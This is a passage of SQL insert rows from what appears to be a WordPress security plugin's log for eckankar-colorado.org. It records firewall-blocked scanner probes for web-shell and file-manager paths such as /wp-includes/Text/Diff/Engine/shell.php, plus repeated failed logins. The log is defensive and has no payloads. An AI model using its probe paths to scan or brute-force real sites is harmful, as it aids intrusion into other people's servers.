Safari/537.1','scan:detectproxy',NULL,NULL),(134558,1700146969.069805,1700146969.060900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Text/Diff/Engine/shell.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9FbmdpbmUvc2hlbGwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134617,1700147150.909214,1700147150.899300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-token.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtdG9rZW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134559,1700146960.674014,1700146960.665300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134635,0.000000,1700156011.177236,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134636,0.000000,1700156691.225045,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134637,0.000000,1700157371.465442,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134638,0.000000,1700158055.103004,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134639,1700158657.513271,1700158657.491500,0x00000000000000000000FFFF9DE61D7C,0,403,0,0,0,'https://eckankar-colorado.org/406.shtml','http://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"LzQwNi5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134560,1700146959.005162,1700146958.996300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134561,1700146957.201480,1700146957.192700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/images/stories/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9zdG9yaWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134643,0.000000,1700160735.135381,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134616,1700147163.212148,1700147163.190300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/php-compat/readonly.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BocC1jb21wYXQvcmVhZG9ubHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134562,1700146955.748571,1700146955.739900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/Assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134642,0.000000,1700160064.900005,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134563,1700146953.727869,1700146953.719100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/include/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luY2x1ZGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(134641,0.000000,1700159396.804046,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134640,0.000000,1700158723.153515,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134644,0.000000,1700161409.000124,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134615,1700147168.495282,1700147168.486300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/random_compat/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JhbmRvbV9jb21wYXQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134564,1700146951.990549,1700146951.981700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/editor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2VkaXRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134645,0.000000,1700162086.911164,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134646,0.000000,1700162772.951356,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134647,0.000000,1700163460.926484,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134565,1700146950.360397,1700146950.345000,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134648,0.000000,1700164135.699196,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134614,1700147180.231873,1700147180.209800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/autoload-php7.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvYXV0b2xvYWQtcGhwNy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134566,1700146948.769759,1700146948.760300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/shop/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Nob3Av\",\"category\":\"brute-force\",\"ssl\":1}'),(134649,0.000000,1700164812.824793,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134650,0.000000,1700165497.309542,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134651,0.000000,1700166178.426881,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134652,0.000000,1700166864.488079,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134567,1700146947.015671,1700146947.005700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/template/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RlbXBsYXRlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134653,1700167425.343722,1700167425.321700,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/.wp-cli/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53cC1jbGkv\",\"category\":\"brute-force\",\"ssl\":1}'),(134613,1700147194.710724,1700147194.688800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/images/slider/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2ltYWdlcy9zbGlkZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134568,1700146945.241578,1700146945.226500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/system/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N5c3RlbS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134569,1700146943.412979,1700146943.403600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/Site/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1NpdGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(134570,1700146941.798787,1700146941.789500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/modules/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134612,1700147196.340297,1700147196.331600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/fckeditor/editor/filemanager/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134571,1700146940.014205,1700146940.005500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/local/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2xvY2FsLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134572,1700146938.335708,1700146938.320800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/vendor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134654,1700167523.089721,1700167523.067300,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/.wp-cli/cache/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53cC1jbGkvY2FjaGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(134611,1700147198.005471,1700147197.996200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/sites/default/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134573,1700146936.587787,1700146936.578900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/Public/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 